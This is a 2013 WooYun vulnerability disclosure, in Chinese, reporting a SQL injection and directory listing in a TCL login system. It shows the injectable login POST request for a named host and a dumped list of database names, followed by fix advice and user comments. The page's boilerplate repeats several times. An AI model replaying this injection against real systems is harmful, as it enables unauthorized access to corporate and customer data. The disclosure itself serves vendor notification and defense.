TCL漏洞7之某系统高权限SQL注射海量数据及列目录

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038498

漏洞标题：TCL漏洞7之某系统高权限SQL注射海量数据及列目录

漏洞作者：小胖子

提交时间：2013-09-29 08:16

修复时间：2013-11-13 08:17

公开时间：2013-11-13 08:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-29：细节已通知厂商并且等待厂商处理中
2013-10-05：厂商已经确认，细节仅向厂商公开
2013-10-15：细节向核心白帽子及相关领域专家公开
2013-10-25：细节向普通白帽子公开
2013-11-04：细节向实习白帽子公开
2013-11-13：细节向公众公开

简要描述：

记不得第几发了

详细说明：

漏洞系统：TCL统一编码平台

http://brio.tcl.com.cn/data/

还有大客户信息哟

列目录

登陆框对数据没有过滤。
抓登陆包。

POST /data/loginin.asp HTTP/1.1
Content-Length: 62
Content-Type: application/x-www-form-urlencoded
Referer: http://brio.tcl.com.cn:80/data/
Cookie: ASPSESSIONIDQCSDCQQB=HIGJBOECKPFHIEBCGFMKAFED
Host: brio.tcl.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
account=1&login=%b5%c7%20%20%c2%bc&passwd=1

果断是注入。

海量数据，读表都要把我卡死。

available databases [23]:
[*] CTL
[*] CTXSYS
[*] DBSNMP
[*] DC
[*] DMSYS
[*] EXFSYS
[*] MDM
[*] MDM1
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PNET
[*] PRICE
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WAREHOUSE
[*] WAREHOUSE_TEST
[*] WMSYS
[*] XDB

漏洞证明：

见详细说明。

修复方案：

0x1：注入请过滤、
0x2：关闭IIS列目录

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2013-10-05 00:41

厂商回复：

由于假期，未即时跟进，尽快转给相关部门处理，So Sorry!

漏洞评价：

2013-09-29 08:52 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

胖哥，你这是要做一哥的节奏吗
2013-09-29 09:20 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

@wefgod 尼玛这，还有中间5个没审核第七就审核了我怎么可能做一哥我只是要上四位数rank @xsser @Finger @疯狗难道各位大哥是按照漏洞类型不同进行了分工的？很好奇啊~
2013-09-29 09:33 | Finger ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗，任何自称Finger并...)

@小胖子今天白天都有事儿
2013-09-29 09:39 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

@小胖子好像是分工的吧，不会是一个人完成。而且准备放假了理解啊
2013-09-29 09:39 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

不过我感觉至少你可以做二哥的位置了，哈哈。准备了，马上了！
2013-09-29 10:21 | 寂寞的瘦子 ( 普通白帽子 | Rank:242 漏洞数:53 | 一切语言转汇编理论)

@小胖子 @gainover @Jannock 带头大哥、二哥快出来，这个小胖子想篡位啊。拿刀砍死这个胖子！

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038498

漏洞标题：TCL漏洞7之某系统高权限SQL注射海量数据及列目录

相关厂商：TCL官方网上商城

漏洞作者：小胖子

提交时间：2013-09-29 08:16

修复时间：2013-11-13 08:17

公开时间：2013-11-13 08:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-038498

漏洞标题：TCL漏洞7之某系统高权限SQL注射海量数据及列目录

相关厂商：TCL官方网上商城

漏洞作者： 小胖子

提交时间：2013-09-29 08:16

修复时间：2013-11-13 08:17

公开时间：2013-11-13 08:17

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-038498"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小胖子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小胖子@乌云